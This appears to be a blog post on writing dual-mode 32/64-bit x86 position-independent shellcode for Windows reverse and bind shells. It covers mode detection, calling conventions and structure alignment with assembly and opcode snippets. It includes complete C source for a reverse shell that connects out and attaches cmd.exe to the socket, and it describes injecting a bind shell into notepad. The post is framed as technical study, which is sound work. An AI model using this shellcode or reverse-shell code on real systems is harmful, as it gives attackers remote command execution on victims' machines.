Shellcode: Dual mode PIC for x86 (Reverse and Bind Shells for Windows)

Introduction

In a nutshell, we’re mixing 32 and 64-bit x86 opcodes so that regardless of the operating system mode (legacy or long), our Position Independent Code (PIC) will still execute successfully. Although some of the code requires conditional jumps, we try avoid these where ever possible.

Writing code to run on both 32 and 64-bit windows has usually required 2 entirely different source codes. The exception was when Peter Ferrie published code to execute calc.exe in both CPU modes. Here we try extend his idea for a connect and bind shell.

Searching for API addresses in the export table uses a similar approach to Peter’s code using conditional jumps.

Because of the different calling conventions (Microsoft x64 vs stdcall) and number of parameters for each API, the actual call to an API is made from seperate pieces of code we refer to as “dispatchers”.

The resulting code is not 100% dual mode but it’s possible using a different approach to what’s shown here. The reason I don’t discuss a 100% dual mode assembly is because it requires more space.

Linux

Here’s a simple dual mode x86 shellcode for Linux just to show how easy it is. 😉

shx

Calling Conventions

32-bit Windows API use Standard Calling convention (stdcall). 64-bit Windows API use Microsoft x64 calling convention which is similar to fastcall or the AMD64 ABI used by Linux/BSD/OSX.

  • Legacy Mode (32-bit)

With stdcall, all parameters to a function are placed on the stack (normally using the PUSH instruction). Before returning to caller, the callee removes parameters (normally using RETN instruction). For cdecl convention, you’ll normally see stack fixed by caller using ADD instruction.

Registers EAX, ECX and EDX are volatile and should be presumed destroyed by function calls.

Registers EBX, ESI, EDI and EBP are non-volatile and must be saved and restored by any function that uses them.

  • Long Mode (64-bit)

The first 4 parameters are placed in RCX, RDX, R8 and R9 in that order. The remaining are placed on the stack. For MSVC compiler, the 5th and any additional parameters are normally stored in stack space using the MOV instruction so as to avoid stack misalignment. The callee does not need to alter the stack before returning.

Registers RAX, RCX, RDX, R8, R9, R10, R11 are volatile and should be presumed destroyed by function calls.

Registers RBX, RBP, RDI, RSI, RSP, R12, R13, R14, and R15 are non-volatile and must be saved and restored by any function that uses them.

Mode detection

Detecting between 2 modes can be achieved using REX prefixes and the flags register, specifically status flags that can be used to make decisions, thus controlling the flow of execution.

Although both NASM and YASM assemblers provide the operand size prefix o64 which is essentially emitting 0x48 at assembly time, we don’t use that here.

flags

The x64 prefix 0x48 which is also a 32-bit opcode for ‘DEC EAX’ will affect the Sign Flag (SF) if EAX is initially zero. Setting EAX to zero first using SUB/XOR/AND will also set the Zero Flag (ZF) to 1.

Actually, even if EAX is not zero before DEC EAX, so long as the result is signed (0x80000000 and above) SF will still be 1. You can also play around with various other conditional jumps; JL/JG for example.

For this code, we’ll perform conditional jumps based on ZF and SF flags.

Jump if Not Zero (JNZ) or Jump if Zero (JZ).

If testing the result of REX prefix, we use Jump if Not Sign (JNS) or Jump if Sign (JS).

There are probably lots of ways to detect between modes so don’t limit your own code to this one approach.

Take the following code when executed in 32-bit mode.

;
    xor    eax, eax
    dec    eax
    js     x32

First, we set the Zero Flag (ZF) to 1 with XOR EAX, EAX. The CPU will then follow through with the jump to x32 because the result of ‘DEC EAX’ will set SF to 1 and ZF to 0. You could alternatively use JNZ instead of JS; both are fine. If jumping to x64 code, you can use JZ or JNS.

In 64-bit mode however, the CPU will ignore the jump because “DEC EAX” or 0x48 is of course a prefix used for 64-bit operations and so the Sign Flag (SF) is unaffected and ZF remains 1.

We need to avoid using EAX when possible. It’s typically only used in final code for detection purposes. You can also use ‘INC EAX’ to affect flags register which is what you see used in the Linux shellcode above.

Home space for 64-bit mode

When you call an API in 64-bit mode, the OS expects 32 bytes of free stack sometimes referred to as home space or Shadow Space depending on who you talk to. It will optionally save RCX, RDX, R8 and R9 here.

x64_hs

When the OS attempts to access API parameters, it will expect them at [rsp+40] or [rsp+28h] as illustrated. 32 bytes are for home space and 8 for return address.

Stack and Structure alignment

For 64-bit mode, the stack must be aligned by 16 bytes minus 8 before calling an API so that SSE2 instructions execute without causing exceptions. It should be 16 minus 8 because once our call to an API is made, the return address will occupy 8 bytes, thus aligning the stack by 16.

Since we’re dealing with both stdcall and Microsoft x64 calling conventions, I’ve opted to push all parameters on the stack and then use a separate piece of code for 64-bit mode.

Structures for 64-bit code obviously have to be aligned by 8 bytes. Although the assembly code does not define any structures, it’s important to know the offset of each field in a structure for both 32 and 64-bit mode.

STARTUPINFO for example defines 2 WORD values (wShowWindow and cbReserved2) which are aligned by 8 as you can see by offset of the lpReserved2 field.

typedef struct _STARTUPINFOA {
    DWORD   cb;              //  +0 or  +0
    LPSTR   lpReserved;      //  +4 or  +8
    LPSTR   lpDesktop;       //  +8 or +16
    LPSTR   lpTitle;         // +12 or +24
    DWORD   dwX;             // +16 or +32
    DWORD   dwY;             // +20 or +36
    DWORD   dwXSize;         // +24 or +40
    DWORD   dwYSize;         // +28 or +44
    DWORD   dwXCountChars;   // +32 or +48
    DWORD   dwYCountChars;   // +36 or +52
    DWORD   dwFillAttribute; // +40 or +56
    DWORD   dwFlags;         // +44 or +60
    WORD    wShowWindow;     // +48 or +64
    WORD    cbReserved2;     // +50 or +66  <-- alignment adds 4 
    LPBYTE  lpReserved2;     // +52 or +72
    HANDLE  hStdInput;       // +56 or +80
    HANDLE  hStdOutput;      // +60 or +88
    HANDLE  hStdError;       // +64 or +96
} STARTUPINFOA, *LPSTARTUPINFOA;

Resolving and executing API

For those of you unfamiliar with this process, please refer to Resolving API addresses in memory.

Although I’ve followed the same idea in this code here where API hashes and additional parameters are accessed through ESI, I may not use this in future. The function to call an API is stored in EBP.

An additional parameter count is stored before the API hash for the x64 dispatcher when pop’ing arguments into RCX, RDX, R8 and R9. We also have to release arguments on the stack after call since Microsoft x64 does not do this but stdcall does.

Here’s what the 32-bit source in x84.asm looks like when working with the PE Export Directory.

x84_asm

Now look at both disassemblies for each mode, first 32-bit which is essentially same as source above.

x32_dis

Then 64-bit

x64_dis

The ‘DEC EAX’ simply turns some opcodes into 64-bit operations when running under 64-bit mode but still works fine under 32-bit mode provided we avoid using EAX as much as possible.

When writing dual mode assembly like this, just imagine EAX doesn’t really exist as a general purpose register and ‘DEC EAX’ is merely an instruction to tell CPU you want the next operation to be 64-bit.

Advancing buffer by 4 or 8 bytes

As you can see from the STARTUPINFO structure above, some data types are 64-bit. When assigning our socket handle to hStdInput, hStdOutput and hStdError, we need to advance the buffer position by 8 bytes.

But in 32-bit mode, we only need to advance 4 so we can of course use conditional jumps for this but instead, we store the socket handle in EBX/RBX, the pointer to memory in EDI/RDI and then use a prefix before SCASD which then adds 4 or 8 depending on CPU mode.

Since we need to avoid using EAX, we can’t use STOSQ which would have DEC EAX prefixed to regular STOSD instruction.

;
    mov    cl, 3
rc_l6x:    
    mov    [edi], ebx  ; si.hStdInput  = s
    dec    eax         ; advance 4 or 8 depending on mode
    scasd
    loop   rc_l6x
//
  /* 01AE */ "\xb1\x03"    /* mov cl, 0x3         */
  /* 01B0 */ "\x89\x1f"    /* mov [rdi], ebx      */
  /* 01B2 */ "\x48\xaf"    /* scasq               */
  /* 01B4 */ "\xe2\xfa"    /* loop 0x1b0          */

The potential problem with this might be if a socket handle returned by WSASocketA occupies more than 32-bits on a 64-bit system.

Reverse shell

So finally here’s a snippet of C code for a simple reverse shell on windows that performs no error checking. Compile this with MSVC or MINGW and use NETCAT or the more advanced NCAT to setup a TCP listener on localhost:1234.

//
  PROCESS_INFORMATION pi;
  STARTUPINFO         si;
  WSADATA             wsa;
  SOCKET              s;
  struct sockaddr_in  sa;
  u_long              ip;
    
  WSAStartup (MAKEWORD(2, 0), &wsa);
  
  s=WSASocket (AF_INET, SOCK_STREAM, 
      IPPROTO_IP, NULL, 0, 0);

  ip = inet_addr ("127.0.0.1"); 
    
  sa.sin_family = AF_INET;
  sa.sin_port   = htons(1234);
  
  memcpy ((void*)&sa.sin_addr, 
      (void*)&ip, sizeof(ip));
    
  connect(s, (struct sockaddr*)&sa, sizeof(sa));

  memset ((void*)&si, 0, sizeof(si));

  si.cb         = sizeof(si);
  si.dwFlags    = STARTF_USESTDHANDLES;
  si.hStdInput  = (HANDLE)s;
  si.hStdOutput = (HANDLE)s;
  si.hStdError  = (HANDLE)s;

  CreateProcess (NULL, "cmd", NULL, NULL, 
    TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);

  WaitForSingleObject (pi.hProcess, INFINITE);
  
  CloseHandle(pi.hProcess);
  CloseHandle(pi.hThread);
  
  closesocket (s);

Demonstration

You can run a demo using Process Injector tool included.

Here’s a screenshot of Windows NT 4.0 running the bind shell running inside notepad.

bind_nt

And here’s me connecting with ncat.

winnt

Summary

The most difficult part of writing code like this is dealing with the different calling conventions.

An exercise left up to the reader would be writing something that entirely avoids using x64 registers which are used in the x64 dispatcher here.

See source codes here for both bind/reverse shells and any future updates.

Advertisements
This entry was posted in assembly, programming, security, shellcode, windows and tagged , , , , , . Bookmark the permalink.

One Response to Shellcode: Dual mode PIC for x86 (Reverse and Bind Shells for Windows)

  1. Pingback: Shellcode: Dual Mode (x86 + x86-64) Linux shellcode | modexp

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s